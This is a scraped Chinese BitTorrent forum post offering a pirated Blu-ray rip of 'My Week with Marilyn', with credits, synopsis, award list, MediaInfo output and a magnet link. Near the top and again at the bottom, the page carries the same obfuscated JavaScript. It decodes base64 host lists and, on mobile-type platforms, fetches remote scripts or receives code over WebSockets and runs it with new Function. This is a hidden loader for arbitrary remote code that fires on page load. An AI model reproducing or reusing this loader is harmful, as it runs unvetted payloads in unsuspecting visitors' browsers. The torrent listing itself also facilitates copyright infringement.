我与梦露的一周[中文字幕].My.Week.with.Marilyn.2011.BluRay.1080p.DTS-HD.MA.5.1.x265.10bit 4.48GB

版主小s 1月前 482

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 我与梦露的一周 / 和玛丽莲的一周 / 情迷梦露7天(港) / 梦露与我的浪漫周记(台) / 与梦露的一周

◎片 名 My Week with Marilyn

◎年 代 2011

◎产 地 英国 / 美国

◎类 别 剧情 / 传记

◎语 言 英语 / 法语

◎上映日期 2011-10-09(纽约电影节) / 2011-11-25(英国) / 2011-12-23(美国)

◎IMDb链接 https://www.imdb.com/title/tt1655420/

◎豆瓣评分 7.2/10 (33982人评价)

◎豆瓣链接 https://movie.douban.com/subject/5151939/

◎片 长 99分钟

◎导 演 西蒙·柯蒂斯 Simon Curtis (id:1032435)

◎编 剧 阿德里安·霍奇斯 Adrian Hodges (id:1286744)

科林·克拉克 Colin Clark (id:1182414)

◎演 员 米歇尔·威廉姆斯 Michelle Williams (id:1049491)

埃迪·雷德梅恩 Eddie Redmayne (id:1010503)

艾玛·沃森 Emma Watson (id:1053624)

朱莉娅·奥蒙德 Julia Ormond (id:1013855)

肯尼思·布拉纳 Kenneth Branagh (id:1036342)

皮普·托伦斯 Pip Torrens (id:1336328)

杰拉丁·萨莫维尔 Geraldine Somerville (id:1045007)

迈克尔·基臣 Michael Kitchen (id:1041237)

米兰达·莱森 Miranda Raison (id:1148600)

卡尔·莫法特 Karl Moffatt (id:1385880)

西蒙·拉塞尔·比尔 Simon Russell Beale (id:1145977)

托比·琼斯 Toby Jones (id:1107884)

罗伯特·波特尔 Robert Portal (id:1317773)

菲利普·杰克森 Philip Jackson (id:1019160)

吉姆·卡特 Jim Carter (id:1077385)

维克多·麦奎尔 Victor McGuire (id:1121768)

多格雷·斯科特 Dougray Scott (id:1036368)

多米尼克·库珀 Dominic Cooper (id:1017901)

理查德·克里弗特 Richard Clifford (id:1329032)

朱迪·丹奇 Judi Dench (id:1054384)

佐伊·沃纳梅克 Zo? Wanamaker (id:1045052)

彼得·怀特 Peter Wight (id:1319601)

德斯·麦卡莱尔 Des McAleer (id:1361465)

德里克·雅各比 Derek Jacobi (id:1027866)

大卫·瑞托 David Rintoul (id:1140400)

杰姆·沃尔 Jem Wall (id:1435146)

杰拉德·霍兰 Gerard Horan (id:1435157)

亚历山大·德斯普拉 Alexandre Desplat (id:1049972)

◎标 签 传记 / 美国 / 英国 / 2011 / 剧情 / 女性 / 爱情 / 文艺

◎简 介

刚刚踏入社会的英国青年科林·克拉克(埃迪·雷德梅恩 Eddie Redmayne 饰)不顾家庭反对,将满腔热情投入自己热爱的电影事业之中,希望能闯出一番天地。勤奋的他得到的第一个跟组机会,竟是担任他的偶像劳伦斯·奥利弗(肯尼思·布拉纳 Kenneth Branagh 饰)导演并主演的新片《游龙戏凤》剧组的第三助理导演。这部电影邀请了当时红遍全球的美国影星玛丽莲·梦露(米歇尔·威廉姆斯 Michelle Williams 饰)主演,而科林的工作便是统筹剧组的各项杂务。开拍之后,梦露与劳伦斯·奥利弗之间因表演方法不同而产生了激烈冲突,致使剧组进度远远落后预期。科林负责于当中调停,他开始与梦露频繁接触。不知不觉间,科林发现自己已为梦露的魅力所深深吸引……

米歇尔·威廉姆斯凭借本片荣获2012年金球奖最佳女主角(喜剧/音乐类)。

◎获奖情况 (共23项)

第84届奥斯卡金像奖 (2012)

最佳女主角(提名)

└──米歇尔·威廉姆斯 (id:1049491)

最佳男配角(提名)

└──肯尼思·布拉纳 (id:1036342)

第69届金球奖 (2012)

电影类 最佳音乐/喜剧片(提名)

电影类 音乐/喜剧片最佳女主角

└──米歇尔·威廉姆斯 (id:1049491)

电影类 最佳男配角(提名)

└──肯尼思·布拉纳 (id:1036342)

第21届MTV电影奖 (2012)

MTV电影奖 最佳银幕形象转变(提名)

└──米歇尔·威廉姆斯 (id:1049491)

第77届纽约影评人协会奖 (2011)

最佳女主角(提名)

└──米歇尔·威廉姆斯 (id:1049491)

最佳处女作(提名)

└──西蒙·柯蒂斯 (id:1032435)

第17届美国评论家选择电影奖 (2012)

最佳女主角(提名)

└──米歇尔·威廉姆斯 (id:1049491)

最佳男配角(提名)

└──肯尼思·布拉纳 (id:1036342)

最佳服装设计(提名)

└──Jill Taylor (id:1298993)

最佳发型化妆(提名)

第27届美国独立精神奖 (2012)

最佳女主角

└──米歇尔·威廉姆斯 (id:1049491)

第10届华盛顿影评人协会奖 (2011)

最佳女主角

└──米歇尔·威廉姆斯 (id:1049491)

最佳男配角(提名)

└──肯尼思·布拉纳 (id:1036342)

第32届波士顿影评人协会奖 (2011)

最佳女主角

└──米歇尔·威廉姆斯 (id:1049491)

第16届圣地亚哥影评人协会奖 (2011)

最佳女主角(提名)

└──米歇尔·威廉姆斯 (id:1049491)

第24届芝加哥影评人协会奖 (2011)

最佳女主角

└──米歇尔·威廉姆斯 (id:1049491)

最具潜力导演(提名)

└──西蒙·柯蒂斯 (id:1032435)

第11届凤凰城影评人协会奖 (2011)

最佳女主角(提名)

└──米歇尔·威廉姆斯 (id:1049491)

最佳男配角(提名)

└──肯尼思·布拉纳 (id:1036342)

十佳影片

第2届豆瓣电影鑫像奖 (2012)

鑫豆单元 最佳女演员(外语)(提名)

└──米歇尔·威廉姆斯 (id:1049491)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 21991866204354224453663296022775666388 (0x108B7AB7B415F48037ADB4D5EC6D16D4)

  4. Complete name : My.Wee[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 4.48 GiB

  8. Duration : 1 h 38 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 6 478 kb/s

  11. Encoded date : UTC 2021-10-09 11:05:17

  12. Writing application : mkvmerge v60.0.0 ('Are We Copies?') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@Main

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 38 min

  21. Bit rate : 4 675 kb/s

  22. Width : 1 920 pixels

  23. Height : 816 pixels

  24. Display aspect ratio : 2.35:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.124

  31. Stream size : 3.23 GiB (72%)

  32. Writing library : x265 3.5+11-c8905a745:[Windows][MSVC 1929][64 bit] 10bit

  33. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=16 / wpp / no-pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x816 / interlace=0 / total-frames=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / ref=6 / no-allow-non-conformance / repeat-headers / annexb / no-aud / no-eob / no-eos / no-hrd / info / hash=0 / no-temporal-layers / no-open-gop / min-keyint=23 / keyint=250 / gop-lookahead=0 / bframes=8 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=57 / lookahead-slices=5 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / no-hist-scenecut / radl=0 / no-splice / no-intra-refresh / ctu=64 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / rdoq-level=0 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=3 / limit-refs=1 / no-limit-modes / me=2 / subme=7 / merange=57 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=0:0 / sao / no-sao-non-deblock / rd=4 / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=0.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=16.0 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / ipratio=1.40 / pbratio=1.30 / aq-mode=3 / aq-strength=1.00 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. Format : DTS XLL

  39. Format/Info : Digital Theater Systems

  40. Commercial name : DTS-HD Master Audio

  41. Codec ID : A_DTS

  42. Duration : 1 h 38 min

  43. Bit rate mode : Variable

  44. Bit rate : 1 777 kb/s

  45. Channel(s) : 6 channels

  46. Channel layout : C L R Ls Rs LFE

  47. Sampling rate : 48.0 kHz

  48. Frame rate : 93.750 FPS (512 SPF)

  49. Bit depth : 16 bits

  50. Compression mode : Lossless

  51. Stream size : 1.23 GiB (27%)

  52. Default : Yes

  53. Forced : No


  54. Text #1

  55. ID : 3

  56. Format : PGS

  57. Muxing mode : zlib

  58. Codec ID : S_HDMV/PGS

  59. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  60. Duration : 1 h 31 min

  61. Bit rate : 24.6 kb/s

  62. Count of elements : 2232

  63. Stream size : 16.1 MiB (0%)

  64. Title : 简体中文

  65. Language : Chinese

  66. Default : Yes

  67. Forced : No


  68. Text #2

  69. ID : 4

  70. Format : PGS

  71. Muxing mode : zlib

  72. Codec ID : S_HDMV/PGS

  73. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  74. Duration : 1 h 31 min

  75. Bit rate : 25.6 kb/s

  76. Count of elements : 2232

  77. Stream size : 16.7 MiB (0%)

  78. Title : 繁体中文

  79. Language : Chinese

  80. Default : Yes

  81. Forced : No




复制代码


TAGS 剧情 传记

磁力链:
  • magnet:?xt=urn:btih:0B6B4D0893E372CAC2EB37365D8958B3C772E2C9

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};